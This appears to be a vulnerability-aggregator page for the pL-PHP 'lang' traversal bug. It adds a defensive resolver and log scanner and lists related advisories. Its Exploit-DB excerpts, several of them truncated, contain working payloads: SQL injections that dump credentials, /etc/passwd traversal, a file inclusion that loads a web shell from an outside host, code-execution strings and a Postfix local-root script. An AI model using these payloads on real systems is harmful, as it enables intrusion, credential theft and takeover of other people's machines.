CVE-2007-2008
published 2007-04-12
Priority: P3 (40, high) · CVSS 2.0: 7.5 · AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS 2.44% (82.2nd percentile)
Directory traversal vulnerability in admin.php in pL-PHP beta 0.9 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang parameter.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pl-php | pl-php | — | — |
CVSS provenance
nvd · v2.0 · 7.5 HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat · 9.3 CRITICAL
GHSA
GHSA-5pr6-chwj-gjpq: Directory traversal vulnerability in admin
ghsa_unreviewed·2022-05-01
CVE-2007-2008 [HIGH] GHSA-5pr6-chwj-gjpq: Directory traversal vulnerability in admin
Directory traversal vulnerability in admin.php in pL-PHP beta 0.9 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang parameter.
Red Hat
kvm/qemu/xen: Incomplete upstream fix for CVE-2007-1320
vendor_redhat·2008-10-29·CVSS 7.2
CVE-2008-4539 [HIGH] kvm/qemu/xen: Incomplete upstream fix for CVE-2007-1320
kvm/qemu/xen: Incomplete upstream fix for CVE-2007-1320
Heap-based buffer overflow in the Cirrus VGA implementation in (1) KVM before kvm-82 and (2) QEMU on Debian GNU/Linux and Ubuntu might allow local users to gain privileges by using the VNC console for a connection, aka the LGD-54XX "bitblt" heap overflow. NOTE: this issue exists because of an incorrect fix for CVE-2007-1320.
Red Hat
phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled
vendor_redhat·2008-10-27·CVSS 6.8
CVE-2008-4775 [MEDIUM] CWE-79 phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled
phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled
Cross-site scripting (XSS) vulnerability in pmd_pdf.php in phpMyAdmin 3.0.0, and possibly other versions including 2.11.9.2 and 3.0.1, when register_globals is enabled, allows remote attackers to inject arbitrary web script or HTML via the db parameter, a different vector than CVE-2006-6942 and CVE-2007-5977.
Red Hat
compiz-fusion: Possible locked desktop access by using Expo plugin mouse shortcuts
vendor_redhat·2008-07-09·CVSS 6.2
CVE-2008-6514 [MEDIUM] compiz-fusion: Possible locked desktop access by using Expo plugin mouse shortcuts
compiz-fusion: Possible locked desktop access by using Expo plugin mouse shortcuts
The Expo plugin in Compiz Fusion 0.7.8 allows local users with physical access to drag the screen saver aside and access the locked desktop by using Expo mouse shortcuts, a related issue to CVE-2007-3920.
Red Hat
kernel: ptrace: Crash on PTRACE_{ATTACH,DETACH} race
vendor_redhat·2008-04-02·CVSS 4.9
CVE-2008-2365 [MEDIUM] kernel: ptrace: Crash on PTRACE_{ATTACH,DETACH} race
kernel: ptrace: Crash on PTRACE_{ATTACH,DETACH} race
Race condition in the ptrace and utrace support in the Linux kernel 2.6.9 through 2.6.25, as used in Red Hat Enterprise Linux (RHEL) 4, allows local users to cause a denial of service (oops) via a long series of PTRACE_ATTACH ptrace calls to another user's process that trigger a conflict between utrace_detach and report_quiescent, related to "late ptrace_may_attach() check" and "race around &dead_engine_ops setting," a different vulnerability than CVE-2007-0771 and CVE-2008-1514. NOTE: this issue might only affect kernel versions before 2.6.16.x.
Red Hat
acroread JavaScript Insecure Method Exposure
vendor_redhat·2008-02-08·CVSS 9.3
CVE-2007-5663 [CRITICAL] acroread JavaScript Insecure Method Exposure
acroread JavaScript Insecure Method Exposure
Adobe Reader and Acrobat 8.1.1 and earlier allows remote attackers to execute arbitrary code via a crafted PDF file that calls an insecure JavaScript method in the EScript.api plug-in. NOTE: this issue might be subsumed by CVE-2008-0655.
Red Hat
acroread JavaScript Insecure Library Search Path
vendor_redhat·2008-02-08·CVSS 6.2
CVE-2007-5666 [MEDIUM] acroread JavaScript Insecure Library Search Path
acroread JavaScript Insecure Library Search Path
Untrusted search path vulnerability in Adobe Reader and Acrobat 8.1.1 and earlier allows local users to execute arbitrary code via a malicious Security Provider library in the reader's current working directory. NOTE: this issue might be subsumed by CVE-2008-0655.
Red Hat
CVE-2008-0495: Unspecified vulnerability in the Pegasus CIM Server in IBM Hardware Management Console (HMC) 7 R3
vendor_redhat·CVSS 7.5
CVE-2008-0495 [HIGH] CVE-2008-0495: Unspecified vulnerability in the Pegasus CIM Server in IBM Hardware Management Console (HMC) 7 R3
Unspecified vulnerability in the Pegasus CIM Server in IBM Hardware Management Console (HMC) 7 R3.2.0 allows remote attackers to cause a denial of service via unspecified vectors.
Statement: We believe this issue is a duplicate of CVE-2007-5360. Not vulnerable. This issue did not affect versions of tog-pegasus as shipped with Red Hat Enterprise Linux 4, or 5. For more details see https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2007-5360
No detection rules found.
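The page lists no detection rule for this CVE, so the following is an added example (it is not pL-PHP code and does not come from any of the sources listed here). It shows the two things a practitioner wants for the bug described above, an include path built from the `lang` query parameter of admin.php: a hardened resolver that allow-lists the parameter and confirms the resolved file stays inside the language directory, and a scanner that flags traversal attempts in access logs, including the percent-encoded and `%00`-terminated variants that appear in the ClanSphere `install.php?lang=` entry further down this page. The `lang/<code>.php` layout, the directory name and the log lines are constructed assumptions for illustration, not pL-PHP's real layout or real traffic.

```python
"""Added example for CVE-2007-2008: not pL-PHP code and not from the page's
sources.  Two pieces: a hardened resolver for an include path built from a
`lang` query parameter, and a scanner that flags the traversal pattern in
web-server access logs.  The 'lang/<code>.php' layout, the directory name
and the log lines below are constructed assumptions for illustration."""

import re
import urllib.parse
from pathlib import Path

# Allow-list for the raw parameter: two-letter code, optional _REGION suffix.
LANG_RE = re.compile(r"^[a-z]{2}(?:_[A-Z]{2})?$")

# A '..' path segment, with '/' or '\' as separator, at any position.
TRAVERSAL_RE = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")

# Combined-format request line: client IP and request target.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)


def decode_param(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded %252e%252e is seen as '..'."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def safe_lang_path(lang_dir: str, lang: str):
    """Return the language file to include for `lang`, or None if unsafe.

    Two independent checks: the allow-list on the decoded parameter (rejects
    '..', '/', '\\' and NUL outright) and a realpath containment check on the
    resolved file, so the include cannot leave lang_dir even if the
    allow-list were loosened later."""
    decoded = decode_param(lang)
    if "\x00" in decoded or not LANG_RE.fullmatch(decoded):
        return None
    base = Path(lang_dir).resolve()          # assumed directory, need not exist
    candidate = (base / f"{decoded}.php").resolve()
    if base not in candidate.parents:        # resolved path escaped lang_dir
        return None
    return str(candidate)


def lang_param_is_traversal(target: str) -> bool:
    """True if the request target's `lang` parameter carries a '..' segment or
    a NUL byte once fully decoded (parse_qs decodes one layer, decode_param
    the rest, so double encoding is caught too)."""
    query = urllib.parse.urlsplit(target).query
    params = urllib.parse.parse_qs(query, keep_blank_values=True)
    for value in params.get("lang", []):
        decoded = decode_param(value)
        if "\x00" in decoded or TRAVERSAL_RE.search(decoded):
            return True
    return False


def scan_access_log(text: str):
    """Return (client_ip, request_target) for every log line whose `lang`
    parameter looks like a traversal attempt."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and lang_param_is_traversal(m.group("target")):
            hits.append((m.group("ip"), m.group("target")))
    return hits


# Constructed sample log: one benign request, three traversal variants
# (plain with NUL, single-encoded, double-encoded) and one unrelated request.
SAMPLE_LOG = """\
203.0.113.10 - - [12/Apr/2007:10:01:02 +0000] "GET /pl-php/admin.php?lang=en HTTP/1.1" 200 5120
203.0.113.11 - - [12/Apr/2007:10:01:05 +0000] "GET /pl-php/admin.php?lang=../../../../etc/passwd%00 HTTP/1.1" 200 1843
203.0.113.12 - - [12/Apr/2007:10:01:09 +0000] "GET /pl-php/admin.php?lang=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1843
203.0.113.13 - - [12/Apr/2007:10:01:12 +0000] "GET /pl-php/admin.php?lang=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1843
203.0.113.14 - - [12/Apr/2007:10:01:15 +0000] "GET /pl-php/index.php?topic=3 HTTP/1.1" 200 9001
"""

if __name__ == "__main__":
    for ip, target in scan_access_log(SAMPLE_LOG):
        print(f"traversal attempt from {ip}: {target}")
```

The allow-list alone would have stopped the original `..` payload; the containment check is there because `lang` allow-lists tend to get widened over time (new locales, underscores, dots), and a realpath comparison keeps the include inside the directory regardless. Keep the scanner's `lang` name configurable if you reuse it for other scripts on the page, such as the ClanSphere `install.php` case, which uses the same parameter name and the same `%00` suffix.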
Exploit-DB
Joomla! Component mDigg 2.2.8 - 'category' SQL Injection
exploitdb·2008-12-24
CVE-2008-6149 Joomla! Component mDigg 2.2.8 - 'category' SQL Injection
Joomla! Component mDigg 2.2.8 - 'category' SQL Injection
---
#############################################################
Joomla Component com_mdigg(category) SQL-injection vulnerability
#############################################################
###################################################
#[~] Author : boom3rang
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
#[~] Vulnerability : SQL injection
#[~] Google Dork : inurl:com_mdigg
#[!] Name : mdigg
#[!] CreationDate : 10-12-2007
#[!] Author : Zhigang Lei
#[!] AuthorEmail : [email protected]
#[!] Version : 2.2.8
###################################################
Example:
http://localHost/path/index.php?option=com_mdigg&act=story_lists&task=view&category=[exploit]
Exploit:
-9999/**/union/
Exploit-DB
ClipShare Pro 2006-2007 - 'chid' SQL Injection
exploitdb·2008-11-15
CVE-2008-5489 ClipShare Pro 2006-2007 - 'chid' SQL Injection
ClipShare Pro 2006-2007 - 'chid' SQL Injection
---
SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM
S N N N A A K K E S T E A A M M M M
SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M
S N N N A A K K E S T E A A M M M
SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M
===================================================SNAKES TEAM====================================================
+ =
= Script: clipShare Remote SQL Injection Vulnerability +
+ =
==============================================:::ALGERIAN HaCkEr:::===============================================
= = = =
= = Discovered By: Snakespc :::ALGERIAN HaCkEr::: = =
= =
= = ************ ::::::home : www.snakespc.com/sc::::::*************** = =
= =
= = :::::Mail: [email protected]::::::: = =
= =
= script:http://www.clip-sha
Exploit-DB
ProActive CMS - 'template' Local File Inclusion
exploitdb·2008-09-18
CVE-2008-4187 ProActive CMS - 'template' Local File Inclusion
ProActive CMS - 'template' Local File Inclusion
---
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ \_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu #
# ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE #
# and all darkc0de members ---#
################################################################
#
# Author: r45c4l
#
# Home : www.darkc0de.com
#
# Email : r45c4l@ho
Exploit-DB
iBoutique 4.0 - 'cat' SQL Injection
exploitdb·2008-09-12
CVE-2008-4354 iBoutique 4.0 - 'cat' SQL Injection
iBoutique 4.0 - 'cat' SQL Injection
---
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ \_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --d3hydr8 - rsauron - baltazar - sinner_01 - C1c4Tr1Z - beenu#
# --- FeDeReR - DON - OutLawz - MAGE -JeTFyrE - Bond #
# and all darkc0de members ---#
################################################################
#
# Author: r45c4l and h4x0r
#
# Home : www.darkc0de.com
#
# Email : r
Exploit-DB
pNews 2.03 - 'newsid' SQL Injection
exploitdb·2008-09-12
CVE-2008-4347 pNews 2.03 - 'newsid' SQL Injection
pNews 2.03 - 'newsid' SQL Injection
---
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ \_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu #
# ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE #
# and all darkc0de members ---#
################################################################
#
# Author: r45c4l
#
# Home : www.darkc0de.com
#
# Email : [email protected]
#
Exploit-DB
Alstrasoft Forum - 'catid' SQL Injection
exploitdb·2008-09-09
CVE-2008-3954 Alstrasoft Forum - 'catid' SQL Injection
Alstrasoft Forum - 'catid' SQL Injection
---
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ \_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu #
# ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE #
# and all darkc0de members ---#
################################################################
#
# Author: r45c4l
#
# Home : www.darkc0de.com
#
# Email : [email protected]
Exploit-DB
Postfix 2.6-20080814 - 'symlink' Local Privilege Escalation
exploitdb·2008-08-31·CVSS 6.2
CVE-2008-2936 [MEDIUM] Postfix 2.6-20080814 - 'symlink' Local Privilege Escalation
Postfix 2.6-20080814 - 'symlink' Local Privilege Escalation
---
#!/bin/sh
#
# "rs_pocfix.sh" (PoC for Postfix local root vulnerability: CVE-2008-2936)
# by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt
#
# Tested: Ubuntu / Debian
#
# [ Madrid, 30.Aug.2008 ]
#
# Config
writable_dir=/tmp
spool_dir=/var/mail # Use "postconf mail_spool_directory" to obtain this
user=root
target=/etc/passwd
useful_link=/usr/bin/atq # lrwxrwxrwx 2 root root 2 2007-05-04 22:15 /usr/bin/atq -> at
useful_link_dst=at # Tip: find / -type l -uid 0 -print -exec ls -l {} \; | less
seconds=3
user_in_passwd="dsr:3GsXLdEaKaGnM:0:0:root:/root:/bin/sh" # Pass is "dsrrocks"
postfix=`which postfix` # /usr/sbin/postfix
postconf=/usr/sbin/postconf
postmap=/usr/sbin/postmap
# Funcs
quit()
{
echo "$1"
exit
}
# Step 1: is
Exploit-DB
phpAuction 3.2.1 - 'item.php' SQL Injection
exploitdb·2008-06-21
CVE-2008-2900 phpAuction 3.2.1 - 'item.php' SQL Injection
phpAuction 3.2.1 - 'item.php' SQL Injection
---
#########################################################
#
# phpauction-gpl Version3.2 Version SQL Injection Vulnerability
#========================================================
# Author: Hussin X =
# =
# Home : www.tryag.cc/cc =
# =
# email: darkangel_g85[at]Yahoo[DoT]com =
# hussin.x[at]hotmail[DoT]com =
# =
#========================================================
# HomE script : http://www.phpauction.net
#
# Demo : http://www.phpauction.net/phpauction-gpl-3.2/
#
#
# DorK : Copyright 2007, PHPAUCTION.NET
#
#
##########################################################
Exploit:
http://www.site.net/[Pats]/item.php?id=-1+%75%6E%69%6F%6E+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2
Exploit-DB
BrowserCRM 5.002.00 - 'clients.php' Remote File Inclusion
exploitdb·2008-06-08
CVE-2008-2690 BrowserCRM 5.002.00 - 'clients.php' Remote File Inclusion
BrowserCRM 5.002.00 - 'clients.php' Remote File Inclusion
---
script: browsercrm-5.002.00 remote file including
Download From: http://www.browsercrm.com/download/browsercrm-5.002.00.tar.gz
dork: Copyright © 2007 BrowserCRM Ltd
Vuln Code :
require_once($bcrm_pub_root . "/public_prepend.inc.php")
exploit:
www.site.com/browser_crm/pub/clients.php?bcrm_pub_root=http://www.gwebspace.de/mohsen/shell/r57.txt?
Author: ahmadbady | [email protected]
# milw0rm.com [2008-06-08]
Exploit-DB
Prozilla Hosting Index - 'cat_id' SQL Injection
exploitdb·2008-04-28
CVE-2008-2083 Prozilla Hosting Index - 'cat_id' SQL Injection
Prozilla Hosting Index - 'cat_id' SQL Injection
---
____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/
.OR.ID
ECHO_ADV_88$2008
[ECHO_ADV_88$2008] Prozilla Hosting Index (directory.php cat_id) Blind Sql Injection Vulnerability
Author : M.Hasran Addahroni
Date : April, 28 th 2007
Location : Jakarta, Indonesia
Web : http://advisories.echo.or.id/adv/adv88-K-159-2008.txt
Critical Lvl : Medium
Impact : System access
Where : From Remote
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Hosting Index
version : unknown
Vendor : http://www.prozilla.com/item.php?item=26
Description :
Vulnerability:
~~~~~~~~~~~~~
Input passed to the "cat_id" parameter in di
Exploit-DB
SAPID CMF Build 87 - 'last_module' Remote Code Execution
exploitdb·2008-02-10
CVE-2007-5056 SAPID CMF Build 87 - 'last_module' Remote Code Execution
SAPID CMF Build 87 - 'last_module' Remote Code Execution
---
### SAPID CMF Build 87 (last_module) Remote Code Execution Vulnerability
### Script R84 : http://puzzle.dl.sourceforge.net/sourceforge/sapidcmf/sapidcmf.r84.zip
### Script Update R87 :http://surfnet.dl.sourceforge.net/sourceforge/sapidcmf/sapidcmf.update.r84-r87.zip
### Dork : Powered by SAPID CMF Build 87
### Vuln :
### 09: */
eval('class perfmon_parent_EXTENDER extends ' . $last_module . '_ADOConnection { }');
### POC :
### /vendors/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};passthru(ls);//
### OR INCLUDE SHELL
### /vendors/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};include(URL-SHELL);//
### I'm TrYaGi ......:)
# milw0rm.com [2008-02-10]
Exploit-DB
Open-Realty 2.4.3 - 'last_module' Remote Code Execution
exploitdb·2008-02-09
CVE-2007-5056 Open-Realty 2.4.3 - 'last_module' Remote Code Execution
Open-Realty 2.4.3 - 'last_module' Remote Code Execution
---
#!/usr/bin/perl
#
# Vendor url: www.open-realty.org
#
# note: exploit requires Register_globals = On in php.ini
# ~Iron
# http://www.randombase.com
require LWP::UserAgent;
print "#
# Open-Realty );
if($target !~ /^http:\/\//)
{
$target = "http://".$target;
}
if($target !~ /\/$/)
{
$target .= "/";
}
print "PHP code to evaluate? ";
chomp($code=);
$code =~ s/(|new;
$ua->timeout(10);
$ua->env_proxy;
$response = $ua->get($target);
if ($response->is_success)
{
print "\n"."#" x 20 ."\n";
print $response->content;
print "\n"."#" x 20 ."\n";
}
else
{
die "Error: ".$response->status_line;
}
# milw0rm.com [2008-02-09]
Exploit-DB
PHP Links 1.3 - 'id' SQL Injection
exploitdb·2008-01-30
CVE-2008-0565 PHP Links 1.3 - 'id' SQL Injection
PHP Links 1.3 - 'id' SQL Injection
---
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------
= Author : Houssamix From H-T Team
= Script : PHP Links from DeltaScripts <= 1.3
= Download : http://softadmin.deltascripts.com/download.php
(PHP Links v1.3 Released 13.09.2007 )
= BUG : Remote SQL Injection Vulnerability
= Dork : Powered by PHP Links from DeltaScripts
= Exploit :
vote.php?id=-1%20union%20select%20concat(user_name,0x3a,user_pass),2,3,4,5,6%20from%20phplinks_users%20where%20user_id=1--
= Note : admin login http://Target/path/admin/
= Greetz : CoNaN - Stack-Terrorist - Gold_M - Rachidox
# milw0rm.com [2008-01-30]
Exploit-DB
ClanSphere 2007.4.4 - 'install.php' Local File Inclusion
exploitdb·2008-01-28
CVE-2008-0489 ClanSphere 2007.4.4 - 'install.php' Local File Inclusion
ClanSphere 2007.4.4 - 'install.php' Local File Inclusion
---
source: https://www.securityfocus.com/bid/27471/info
ClanSphere is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability using directory-traversal strings to access potentially sensitive information that may aid in further attacks.
ClanSphere 2007.4.4 is vulnerable to this issue; other versions may also be affected.
http://www.example.com/install.php?lang=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
Exploit-DB
Uebimiau Web-Mail 2.7.10/2.7.2 - Remote File Disclosure
exploitdb·2008-01-06
CVE-2008-0210 Uebimiau Web-Mail 2.7.10/2.7.2 - Remote File Disclosure
Uebimiau Web-Mail 2.7.10/2.7.2 - Remote File Disclosure
---
----[ Uebimiau Web-Mail Remote File Reader ... ITDefence.ru Antichat.ru ]
Uebimiau Web-Mail Remote File Reader
Eugene Minaev [email protected]
____/ __ __ _______________________ _______ _______________ \ \ \
/ .\ / /_// // / \ \/ __ \ /__/ /
/ / /_// /\ / / / / /___/
\/ / / / / /\ / / /
/ / \/ / / / / /__ //\
\ / ____________/ / \/ __________// /__ // /
/\\ \_______/ \________________/____/ 2007 /_//_/ // //\
\ \\ // // /
.\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / .
. \_\\________[________________________________________]_________//_//_/ . .
At first i decided to look login script . Each script includes this code
0) {
..elseif (
($sess["auth"] && intval((time()-$start)/60) mail_user = $f_user = $sess["user"];
Exploit-DB
XOOPS mod_gallery Zend_Hash_key + Extract - Remote File Inclusion
exploitdb·2008-01-06
CVE-2008-0138 XOOPS mod_gallery Zend_Hash_key + Extract - Remote File Inclusion
XOOPS mod_gallery Zend_Hash_key + Extract - Remote File Inclusion
---
----[ XOOPS mod_gallery Zend_Hash_key + Extract RFI ... ITDefence.ru Antichat.ru ]
XOOPS mod_gallery Zend_Hash_key + Extract REMOTE FILE INCLUDE
Eugene Minaev [email protected]
____/ __ __ _______________________ _______ _______________ \ \ \
/ .\ / /_// // / \ \/ __ \ /__/ /
/ / /_// /\ / / / / /___/
\/ / / / / /\ / / /
/ / \/ / / / / /__ //\
\ / ____________/ / \/ __________// /__ // /
/\\ \_______/ \________________/____/ 2007 /_//_/ // //\
\ \\ // // /
.\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / .
. \_\\________[________________________________________]_________//_//_/ . .
Bug works only with register_globals = OFF. I find their security fix very fun, and you? :)
Hah .. very serious security
Exploit-DB
DivX Player 6.6.0 - ActiveX 'SetPassword()' Denial of Service (PoC)
exploitdb·2008-01-02
CVE-2008-0090 DivX Player 6.6.0 - ActiveX 'SetPassword()' Denial of Service (PoC)
DivX Player 6.6.0 - ActiveX 'SetPassword()' Denial of Service (PoC)
---
function crash() {
var buff = '';
for(i=0;i
DivX SetPassword (npUpload.dll) Denial of Service
Tested on IE 7 and Divx Player 6.6.0
Registers:
EAX 00000000
ECX FFFFFFFF
EDX 0191CA50
EBX 008E06E0
ESP 0191C9E4
EBP 0191CA50
ESI 00000000
EDI 00000000
EIP 061F2B52 npUpload.061F2B52
Access violation when reading [00000000]...
Discovered by shir, 02/01/2007
Crash...
# milw0rm.com [2008-01-02]
Exploit-DB
Ubuntu 6.06 - DHCPd Remote Denial of Service
exploitdb·2007-11-02·CVSS 7.2
CVE-2008-5010 [HIGH] Ubuntu 6.06 - DHCPd Remote Denial of Service
Ubuntu 6.06 - DHCPd Remote Denial of Service
---
Ubuntu 6.06 DHCPd bug Remote Denial of Service Exploit
Author: RoMaNSoFt
Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4601.tgz (1022007-DoS-CVE-2007-5365.tgz)
# milw0rm.com [2007-11-02]
Exploit-DB
Microworld eScan (Multiple Products) - Local Privilege Escalation
exploitdb·2007-08-30
CVE-2007-4649 Microworld eScan (Multiple Products) - Local Privilege Escalation
Microworld eScan (Multiple Products) - Local Privilege Escalation
---
source: https://www.securityfocus.com/bid/25493/info
Multiple MicroWorld eScan products are vulnerable to a local privilege-escalation vulnerability because of insecure default file permissions.
Attackers can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful attacks will completely compromise affected computers.
The following are vulnerable:
eScan Internet Security 9.0.722.1
eScan Virus Control 9.0.722.1
eScan AntiVirus 9.0.722.1
UPDATE (September 4, 2008): The following additional products have been reported as vulnerable:
eScan Corporate 9.0.x
eScan Professional 9.0.x
eScan Workstation Server 9.0.x
eScan Web and Mail Filter 9.0.x
MailScan for Mail-Server 5.6a
MailScan for SMT
Exploit-DB
pl-PHP Beta 0.9 - Multiple Vulnerabilities
exploitdb·2007-04-10
CVE-2007-2008 pl-PHP Beta 0.9 - Multiple Vulnerabilities
pl-PHP Beta 0.9 - Multiple Vulnerabilities
---
. . .
._ | _. .|_ _. _.;_/
[_)|(_]\_|[ )(_](_.| \.net
| ._|
"pL-PHP beta 0.9 - MULTIPLE VULNERABILITIES"
by Omni
1) Infos
Date : 2007-04-10
Product : pL-PHP
Version : beta 0.9 - Prior version maybe also be affected
Vendor : http://sourceforge.net/projects/pl-php/ - http://www.karlcore.com/programming/blog/
Vendor Status : 2007-04-10 -> Not Informed!
Description : pL-PHP is a new PHP Portal or Content Management System (CMS). It is based on a "multi-topics" system,
with sub-topics, and all the content (downloads, articles, headers, links...) is shared into these topics
and sub-topics. It will be very easy to use.
Source : omnipresent - omni
E-mail : omnipresent[at]email[dot]it - omni[at]playhack[dot]net
Team : Playhack.net Security
2) Sec
Trendmicro
CVE-2017-9791: New Apache Struts RCE Vulnerability
blogs_trendmicro·2017-07-13·CVSS 9.8
CVE-2017-9791 [CRITICAL] CVE-2017-9791: New Apache Struts RCE Vulnerability
# CVE-2017-9791: New Apache Struts RCE Vulnerability
The Apache Struts framework is useful for building modern Java-based web applications. A vulnerability has been found in the Struts 1 plugin that could allow remote code execution on the affected server, if used with Struts 2.3.x
By: Govind Sarda
2017/07/13
The Apache Struts framework is useful for building modern Java-based web applications, with two major versions, Apache Struts 1 and Apache Struts 2, released so far. Support for Apache Struts 1 ended in 2008 with the adoption of Apache Struts 2, which reached its first full release at the start of 2007. A Struts 1 plugin is available that allows developers to use existing Struts 1 Actions and ActionForms in Struts 2 web applications. A vulnerability has b
Talos
Flash Vulnerability Info
blogs_talos·2008-05-30·CVSS 9.3
[CRITICAL] Flash Vulnerability Info
## Flash Vulnerability Info
On 5-27-2008 Symantec issued a 0-day vulnerability alert pertaining to malicious flash (SWF) files circulating in the wild. The initial Symantec report stated that this issue was unknown and that it affected the latest version 9.0.124.0 of flash player and several other Adobe products that processed SWF files. Further analysis of the exploit files determined that the initial categorization of this as 0-day was incorrect and that this was actually a working implementation of the vulnerability described by Mark Dowd of the IBM X-Force team.
For more details on this flash vulnerability (CVE-2007-0071) then take a look at our analysis here:
http://www.snort.org/vrt/docs/analysis/flash-cve-2007-0071.html
Enjoy.
Bugzilla
CVE-2007-6731 xmp: Multiple buffer overflows in OXM decoder
bugzilla·2009-09-14·CVSS 10.0
CVE-2007-6731 [CRITICAL] CVE-2007-6731 xmp: Multiple buffer overflows in OXM decoder
CVE-2007-6731 xmp: Multiple buffer overflows in OXM decoder
Common Vulnerabilities and Exposures assigned an identifier CVE-2007-6731 to
the following vulnerability:
Extended Module Player (XMP) 2.5.1 and earlier allow remote attackers
to execute arbitrary code via an OXM file with a negative value, which
bypasses a check in (1) test_oxm and (2) decrunch_oxm functions in
misc/oxm.c, leading to a buffer overflow.
References:
http://aluigi.altervista.org/adv/xmpbof-adv.txt
http://www.securityfocus.com/bid/27047
http://www.vupen.com/english/advisories/2008/0009
PoC:
----
http://aluigi.org/poc/xmpbof.zip (/a.out 1 out.oxm)
Upstream status -- issue addressed in xmp-2.6.0:
http://sourceforge.net/project/shownotes.php?group_id=26422&release_id=692238
Credit:
Luigi Auriemma
Discussion:
T
Bugzilla
CVE-2008-5316 lcms: insufficient input validation in ReadEmbeddedTextTag
bugzilla·2008-11-28·CVSS 9.3
CVE-2008-5316 [CRITICAL] CVE-2008-5316 lcms: insufficient input validation in ReadEmbeddedTextTag
CVE-2008-5316 lcms: insufficient input validation in ReadEmbeddedTextTag
The ReadEmbeddedTextTag in src/cmsio1.c did not properly check amount
of data read from the input file to the buffer provided as one of its
arguments. Value read from the file was used as an upper bound without
any validation.
This issue was fixed upstream in 1.16.
Upstream CVS commit:
http://lcms.cvs.sourceforge.net/viewvc/lcms/lcms/src/cmsio1.c?r1=1.33&r2=1.34
(some of the previous changes may be needed for 1.15)
References:
http://www.openwall.com/lists/oss-security/2008/11/28/3
Discussion:
Created attachment 325024
Patch used in SuSE security updates
This was extracted from SuSE liblcms-1.15-32.src.rpm. Original name of the patch was lcms-CVE-2007-2741.patch, but CVE-2007-2741 is a different issue that got
Bugzilla
